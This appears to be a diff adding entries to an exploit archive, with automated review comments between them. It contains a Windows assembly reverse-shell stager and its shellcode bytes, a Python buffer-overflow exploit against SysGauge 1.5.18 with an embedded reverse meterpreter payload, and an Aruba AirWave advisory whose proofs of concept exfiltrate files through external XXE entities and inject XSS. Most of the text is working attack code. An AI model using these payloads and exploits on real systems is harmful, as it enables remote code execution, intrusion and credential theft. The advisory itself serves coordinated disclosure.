+ mov [esi+28],ebx ;esi offset 28 -> kernel32
+
+ ;--------winsock2.dll Address--------------
+ xor edi,edi
+ push edi
+ push 0x41797261 ; Ayra
+ push 0x7262694c ; rbiL
+ push 0x64616f4c ; daoL
+ push esp
+ push ebx
+
+ call [esi]
+
+ ;-----ws2_32.dll Address-------
+ xor ecx,ecx
+ push ecx
+ mov cx, 0x3233 ; 0023
+ push ecx
+ push 0x5f327377 ; _2sw
+ push esp
+
+ call eax
+ mov ebp,eax ;ebp = ws2_32.dll
+
+ ;-------WSAstartup Address-------------
+ xor ecx,ecx
+ push ecx
+ mov cx, 0x7075 ; 00up
+ push ecx
+ push 0x74726174 ; trat
+ push 0x53415357 ; SASW
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+12],eax ;esi offset 12 -> WSAstartup
+
+ ;-------WSASocketA Address-------------
+ xor ecx,ecx
+ push ecx
+ mov cx, 0x4174 ; 00At
+ push ecx
+ push 0x656b636f ; ekco
+ push 0x53415357 ; SASW
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+16],eax;esi offset 16 -> WSASocketA
+
+ ;------connect Address-----------
+ push edi
+ mov ecx, 0x74636565 ; '\0tce'
+ shr ecx, 8
+ push ecx
+ push 0x6e6e6f63 ; 'nnoc'
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+20],eax;esi offset 20 -> connect
+
+ ;------recv Address-------------
+ push edi
+ push 0x76636572 ;vcer
+ push esp
+ push ebp
+
+ call [esi]
+ mov [esi+24],eax;esi offset 24 -> recv
+
+ ;------call WSAstartup()----------
+ xor ecx,ecx
+ sub sp,700
+ push esp
+ mov cx,514
+ push ecx
+ call [esi+12]
+
+ ;--------call WSASocket()-----------
+ ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
+ ; IPPROTO_TCP = 6, NULL,
+ ;(unsigned int)NULL, (unsigned int)NULL);
+
+ push eax ; if successful, eax = 0
+ push eax
+ push eax
+ mov al,6
+ push eax
+ mov al,1
+ push eax
+ inc eax
+ push eax
+
+ call [esi+16]
+ xchg eax, edi ; edi = SocketRefernce
+
+
+ ;--------call connect----------
+
+ ;struct sockaddr_in {
+ ; short sin_family;
+ ; u_short sin_port;
+ ; struct in_addr sin_addr;
+ ; char sin_zero[8];
+ ;};
+
+
+ push byte 0x1
+ pop edx
+ shl edx, 24
+ mov dl, 0x7f ;edx = 127.0.0.1 (hex)
+ push edx
+ push word 0x5c11; port 4444
+ push word 0x2
+
+ ;int connect(
+ ;_In_ SOCKET s,
+ ;_In_ const struct sockaddr *name,
+ ;_In_ int namelen
+ ;);
+
+ mov edx,esp
+ push byte 16 ; sizeof(sockaddr)
+ push edx ; (sockaddr*)
+ push edi ; socketReference
+
+ call [esi+20]
+
+
+ ;--------call recv()----------
+
+ ;int recv(
+ ;_In_ SOCKET s,
+ ;_Out_ char *buf,
+ ;_In_ int len,
+ ;_In_ int flags
+ ;);
+
+
+stage:
+ push eax
+ mov ax,950
+ push eax ;buffer length
+ push esp
+ pop ebp
+ sub ebp,eax ; set buffer to [esp-950]
+ push ebp ;&buf
+ push edi ;socketReference
+
+ call [esi+24]
+
+executeStage:
+ xor edx,edx
+ mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret
+ mov byte [ebp+96],dl ; null terminator to ExitProcess
+ mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
+ dec ebp
+ mov word [ebp+20],0x16ff ; call DWORD [esi]
+ mov word [ebp+35],0x0689 ; mov [esi],eax
+ mov word [ebp+110],0x16ff; call DWORD [esi]
+ mov word [ebp+120],0x0689; mov [esi],eax
+ mov ax,0x4173 ; As (CreateProcessA)
+ mov ecx,[esi+28] ; ecx = kernel32
+ dec dl ;edx = 0x000000ff
+ call ebp ; Execute Alphanumeric stage
+executeShell:
+ mov [ecx],dl ;null terminator to 'cmd.exe'
+ call dword [esi] ;createProcA
+ push eax
+ call dword [esi+4] ; ExitProccess
+
+
+
+ -----------------------
+
+unsigned char shellcode[]=
+"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";
\ No newline at end of file
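Review bot: The file carries an .asm extension, but the header prose (L467-504), the byte-by-byte decoding table (L507-568) and the C array (L807-810) use no comment syntax, so the listing does not assemble as a unit; only `global _start` through `call dword [esi+4]` (L575-803) is NASM source. Prefixing the non-assembler parts with `;` or moving them to a companion text file would keep the record consistent with the other shellcode entries in this commit. The comment at L584 reads "Proccess Enviroment Block" and should be "Process Environment Block"; that line and the export-name comparison at L606-608 are the parts a detection engineer would key on, so a one-line comment naming the technique there (presumably a PEB loader-list walk to find kernel32 — confirm against L584-590) would help readers.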
diff --git a/platforms/windows/remote/41479.py b/platforms/windows/remote/41479.py
new file mode 100755
index 000000000..c24f8fad3
--- /dev/null
+++ b/platforms/windows/remote/41479.py
@@ -0,0 +1,69 @@
+# Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
+# Version: 1.5.18
+# Tested on: Windows Server 2008 R2 Standard x64
+# CVE : requested
+
+# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below.
+# The 1st part can be max. 236 bytes
+# The 2nd part can be max. 76 (leave at least 4 NOPs)
+
+
+import socket
+
+# QtGui4.dll 0x6527635E - CALL ESP
+jmp = "\x5e\x63\x27\x65"
+nops = "\x90"*8
+
+
+# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20
+#IP: 192.168.198.128, PORT: 4444
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
+
+rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
+"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
+"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
+"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
+"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
+"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
+"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
+"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
+"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
+"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
+"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
+"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
+"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
+"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
+"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
+"\xc1\x48\x45\x0e\x32\x6b\x4c")
+
+
+rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
+"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
+"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
+"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
+"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
+"\xe2\x79\xdc\x2d\x97\x97")
+
+
+buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
+port = 25
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+
+print 'Listening on SMTP port: '+str(port)
+print(len(rev_met_1))
+print(len(rev_met_2))
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 '+buffer+'ESMTP Sendmail \r\n')
+ conn.close()
+
+
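Review bot: The script mixes a Python 2 `print` statement (the `print 'Listening on SMTP port: '+str(port)` line) with call-style `print(len(rev_met_1))` / `print(len(rev_met_2))`, so it only runs under Python 2 — on Python 3 the first form is a SyntaxError and the `str` payloads passed to `conn.send` would have to be `bytes` anyway. Since the header block already records "Tested on", it should also state the interpreter requirement, e.g. `# Requires: Python 2 (print statement, str payloads)`, so a reader does not waste time porting the banner string. The bad-character comment `# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20` disagrees with the generator command two lines below it, which excludes `\x00\x0a\x0d\x20`; one of the two is a typo and the comment should match the command that actually produced `rev_met_1`/`rev_met_2`, since the byte lists cannot be checked against the comment otherwise. The `while True` accept loop never terminates and the socket is never closed; a `try`/`finally: s.close()` around the loop (or a `with`-style wrapper) would let Ctrl-C release port 25 cleanly.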
diff --git a/platforms/xml/webapps/41482.txt b/platforms/xml/webapps/41482.txt
new file mode 100755
index 000000000..dc1f73c2f
--- /dev/null
+++ b/platforms/xml/webapps/41482.txt
@@ -0,0 +1,226 @@
+SEC Consult Vulnerability Lab Security Advisory < 20170301-0 >
+=======================================================================
+ title: XML External Entity Injection (XXE),
+ Reflected Cross Site Scripting
+ product: Aruba AirWave
+ vulnerable version: <=8.2.3
+ fixed version: 8.2.3.1
+ CVE number: CVE-2016-8526, CVE-2016-8527
+ impact: high
+ homepage: http://www.arubanetworks.com/
+ found: 2016-11-21
+ by: P. Morimoto (Office Bangkok)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
+ Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
+
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+"Aruba, a Hewlett Packard Enterprise company, (formerly "Aruba Networks, Inc.")
+is a networking vendor selling enterprise wireless LAN and edge access
+networking equipment. The company has over 1,800 employees and is
+headquartered in Sunnyvale, California. Aruba's core products are access points
+(APs), mobility controllers, and network management software through their
+Airwave Management Platform product."
+
+Source: https://en.wikipedia.org/wiki/Aruba_Networks
+
+
+Business recommendation:
+------------------------
+SEC Consult recommends not to use the product in a production environment
+until a thorough security review has been performed by security professionals
+and all identified issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) XML External Entity Injection (CVE-2016-8526)
+The used XML parser is resolving external XML entities which allows attackers
+to read files and send requests to systems on the internal network (e.g port
+scanning).
+
+The vulnerability can be exploited by a low privileged read-only user
+to read sensitive information / files with malicious XML code.
+Note that as Aruba's passwords are encrypted with a shared static key,
+privilege escalation to admin role is also possible!
+
+Multiple different functions are affected by XXE.
+
+According to the vendor another researcher has also found one of the XXE issues, hence
+credits go to them as well.
+Vendor: "Although the team hasn't reproduced this yet, I’ve had other reports
+come in through our bug bounty program last month about XXE issues in VisualRF.
+One of the issues you reported is the same, and you reported three others that we
+haven't seen yet."
+
+
+2) Reflected Cross Site Scripting (CVE-2016-8527)
+Due to the lack of input validation, an attacker can insert malicious JavaScript
+code to be executed under a victim's browser context.
+
+
+Proof of concept:
+-----------------
+1) XML External Entity Injection (CVE-2016-8526)
+a) XXE in VisualRF Backup Sites
+
+Login as any user role (including read-only/standard user)
+Navigate to VisualRF > Floor Plans > Select 'View' under 'Network' section.
+Select a campus (e.g. Default Campus) > Select 'Edit' >
+Select action 'Export Floor Plans' > Ok
+
+POST /visualrf/backup_sites HTTP/1.1
+Host:
+[...]
+
+xml=:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b
+
+$ cat sectest.dtd
+">
+:2121/%data;'>">
+
+$ python -m SimpleHTTPServer 1234
+$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
+$ ruby xxe-ftp-server.rb
+FTP. New client connected
+< USER anonymous
+< PASS Java1.8.0_102@
+> 230 more data please!
+< TYPE I
+> 230 more data please!
+< CWD [General]
+[...]
+< ; set global WLC credentials
+> 230 more data please!
+< wlc_user:
+> 230 more data please!
+< wlc_pasw:
+[...]
+
+b) XXE in Visual RF Site Restore
+$ cat version.xml
+
+ :1234/version.dtd">%foo;%param1;]>
+ &exfil;
+
+$ zip backup_sectest.zip version.xml
+ adding: version.xml (deflated 16%)
+
+And then just upload the backup_sectest.zip via the restore functionality.
+
+POST /nf/visualrf_siterestore HTTP/1.1
+Host:
+[...]
+
+------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
+Content-Disposition: form-data; name="zip"; filename="backup_sectest.zip"
+Content-Type: application/zip
+
+[.. backup_sectest.zip ..]
+------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
+Content-Disposition: form-data; name="import"
+
+Import
+------WebKitFormBoundaryjPK7DdVbiNVDEJ2A--
+
+
+c) XXE in Visual RF Verify
+POST /visualrf/verify/ HTTP/1.1
+Host:
+[...]
+
+:1234/sectest.dtd">%foo;%param1;]>&exfil;
+
+
+2) Reflected Cross Site Scripting (CVE-2016-8527)
+Note that the XSS payload can be used with either HTTP parameter 'start' or 'end'.
+
+GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match HTTP/1.1
+Host:
+
+[...]
+HTTP/1.1 200 OK
+[...]
+
+
+
+ For input string: ""
+
+
+
+
+Vulnerable / tested versions:
+-----------------------------
+The following versions are affected by the identified vulnerabilities which
+were the most recent versions at the time of discovery:
+Aruba AirWave version <8.2.3.1
+
+
+Vendor contact timeline:
+------------------------
+2016-11-23: Contacting vendor through aruba-sirt@hpe.com
+2016-11-23: Vendor: Established communication over encrypted channel and asked
+ for extending the disclosure date due to the upcoming holidays
+2017-01-18: CVE-2016-8526 was assigned for the XXE issue, and CVE-2016-8527 for
+ the reflected XSS issue.
+2017-02-21: Aruba AirWave 8.2.3.1 was released.
+2017-03-01: Coordinated disclosure of the security advisory.
+
+
+Solution:
+---------
+Update to version 8.2.3.1 or later.
+
+http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
+https://support.arubanetworks.com/Documentation/tabid/77/DMXModule/512/EntryId/23738/Default.aspx
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
+Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/Career.htm
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Pichaya Morimoto / @2017
\ No newline at end of file